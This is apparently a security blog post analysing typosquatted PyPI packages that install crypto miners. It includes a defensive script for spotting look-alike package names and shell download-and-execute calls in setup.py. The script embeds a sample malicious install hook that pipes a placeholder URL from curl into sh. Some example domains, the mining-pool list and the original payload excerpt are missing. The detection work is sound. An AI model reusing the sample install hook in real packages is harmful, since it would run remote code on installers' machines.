
Itay Vaknin, Threat Intelligence Researcher.

The complexity of the modern software development process and its reliance on large community-maintained codebases introduces a risk for developers to inadvertently include malicious code in their project. The implications can be severe: in many cases, it can mean a complete takeover of the developed program or device by an attacker.

Attackers attempt to generate this scenario in several ways, among them trying to introduce malicious or vulnerable code into open-source projects and using Typosquatting – adding malicious code into software repositories such as PyPI and npm under names which could be included in a project by mistake (such as misspelled names of legitimate software packages).

In this blog post, we present our own additional research done on top of a novel detection by Sonatype, where a few PyPI packages were detected as malicious packages, packing a crypto-miner payload that mines Ethereum or Ubiq for the attacker. We will:

- Discuss additional methods for automatically detecting these malicious packages, which may indicate a possible supply chain attack.
- Present an easy way to deobfuscate the attacker’s packages.
- Analyze a newer variant of one of the attacking packages.
- Present actionable solutions that developers may use to detect and prevent such attacks on their machines.

Typosquatting is the practice of obtaining (or “squatting”) a popular name with a slight typographical error. For example – buying the domain name “” (instead of the legitimate “”) hoping that users will occasionally make typing errors and reach the illegitimate domain. The practice applies to many different resources, such as web pages, software package names, and even executable names. This can then further be used for phishing and code injection attacks.

In this case, the typosquatting attack was performed on PyPI, ensnaring any developer that misspelled the “matplotlib” package name when using pip install.

The typosquatting attack flow of the malicious published packages can be summarized in the following way:

The attacker published six malicious packages into PyPI –

- Maratlib, maratlib1, mplatlib, matplatlib-plus – Typosquatting packages alluding to the popular matplotlib or mplotlab.
- learninglib, mllearnlib – Typosquatting packages alluding to learnlib and mllearn.

Some of the above packages were just proxy packages, which included an actual malicious package as part of their dependencies.

The malicious packages download and execute a payload shell script. The payload shell script downloads and executes a 3rd party crypto miner, either T-Rex for mining Ethereum or ubqminer / PhoenixMiner for mining Ubiq. The funds are transferred into several mining pools, including:

#Naïve Typosquatting vs.

Some of the previous supply chain attacks were much more subtle and introduced a “trojan library” – meaning a library that was actually of some use, but had a small piece of hidden malware code inside it. For example, in a previous attack, a malicious npm package provided colorful logging features for the console, along with a hidden credential stealer.

#The Python payload

In the case of this attack, the Python payload was extremely short and simple –

(Excerpt from maratlib package, version 0.6)

Since this is the entire Python payload, it is elementary to detect using automated methods: a “download and execute” command (especially one that goes through the shell via subprocess) is highly malicious.

#matplatlib-plus – a slight variation on the above
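The two detection ideas above (catching near-miss package names before pip installs them, and catching the “download and execute” shape of the payload in a package's setup.py) can both be scripted. The following is an added example written for this post; it is not Intezer's, Sonatype's or the attacker's code. The allow-list `KNOWN_PACKAGES`, the 0.65 similarity threshold, the `FETCH_HINTS` keywords and the two sample `setup.py` strings are all constructed for the demonstration; the sample uses a placeholder URL and only mirrors the pattern the post describes.

```python
"""Added example (not from the post): two defender-side checks for the attack
pattern described above. KNOWN_PACKAGES, the threshold and the two sample
setup.py files are constructed for the demonstration."""
import ast
import difflib
import re

# Constructed allow-list of names worth protecting; a real deployment would
# load the top few thousand PyPI project names instead.
KNOWN_PACKAGES = ("matplotlib", "numpy", "requests", "learnlib", "mllearn")

# Calls that hand a command string to a shell (os.*) or can do so (shell=True).
SHELL_EXEC = {"os.system", "os.popen", "subprocess.call", "subprocess.run",
              "subprocess.Popen", "subprocess.check_call", "subprocess.check_output"}
# Constructed hints that a shell command string also fetches something remote.
FETCH_HINTS = ("curl ", "wget ", "http://", "https://")


def normalize(name):
    """PEP 503 normalisation: lowercase, runs of '-', '_' and '.' become '-'."""
    return re.sub(r"[-_.]+", "-", name.lower())


def typosquat_candidates(requested, known=KNOWN_PACKAGES, cutoff=0.65):
    """Well-known names that `requested` resembles but does not equal.

    difflib's similarity ratio with a constructed 0.65 cutoff catches the names
    in the post (maratlib, mplatlib, learninglib, ...) without flagging
    unrelated names. Exact matches are never reported.
    """
    name = normalize(requested)
    if name in known:
        return []
    return difflib.get_close_matches(name, known, n=3, cutoff=cutoff)


def _dotted(node):
    """'subprocess.call' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return (lineno, kind, call) for shell-executing calls in a setup.py.

    kind is 'download-and-execute' when the literal command string also fetches
    something from the network, otherwise 'shell-exec'.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        call = _dotted(node.func)
        if call not in SHELL_EXEC:
            continue
        shell = any(kw.arg == "shell" and getattr(kw.value, "value", None) is True
                    for kw in node.keywords)
        if not (call.startswith("os.") or shell):
            continue  # list-form argv without a shell: ordinary build tooling
        first = node.args[0] if node.args else None
        cmd = first.value if isinstance(first, ast.Constant) and isinstance(first.value, str) else ""
        kind = "download-and-execute" if any(h in cmd for h in FETCH_HINTS) else "shell-exec"
        findings.append((node.lineno, kind, call))
    return findings


# Constructed sample: the install-hook shape of the payload the post describes,
# with a placeholder URL (not the real package's code).
SAMPLE_MALICIOUS = '''
from setuptools import setup
from setuptools.command.install import install
import subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.call("curl -s http://example.invalid/run.sh | sh", shell=True)

setup(name="typosquat-like", version="0.6", cmdclass={"install": PostInstall})
'''

# Constructed sample: a benign build step that runs git without a shell.
SAMPLE_BENIGN = '''
from setuptools import setup
import subprocess

rev = subprocess.check_output(["git", "rev-parse", "--short", "HEAD"]).decode().strip()
setup(name="mypkg", version="1.0+" + rev)
'''


if __name__ == "__main__":
    for req in ("maratlib", "mplatlib", "matplatlib-plus", "learninglib", "mllearnlib", "numpy"):
        print(f"{req:18} -> {typosquat_candidates(req)}")
    print("malicious:", scan_setup_py(SAMPLE_MALICIOUS))
    print("benign:   ", scan_setup_py(SAMPLE_BENIGN))
```

The name check is deliberately fuzzy rather than a strict edit-distance rule, because names such as “maratlib” sit several edits away from “matplotlib” yet still read as the same word to a tired developer; in practice the allow-list should be the projects your organisation actually depends on, and a hit should block the install for human review rather than auto-reject it. The setup.py scan only reacts to commands that reach a shell, so list-form `subprocess` calls used by legitimate build steps stay quiet; it will not see a command assembled at runtime, which is exactly why the post goes on to deobfuscate the packages rather than rely on string matching alone.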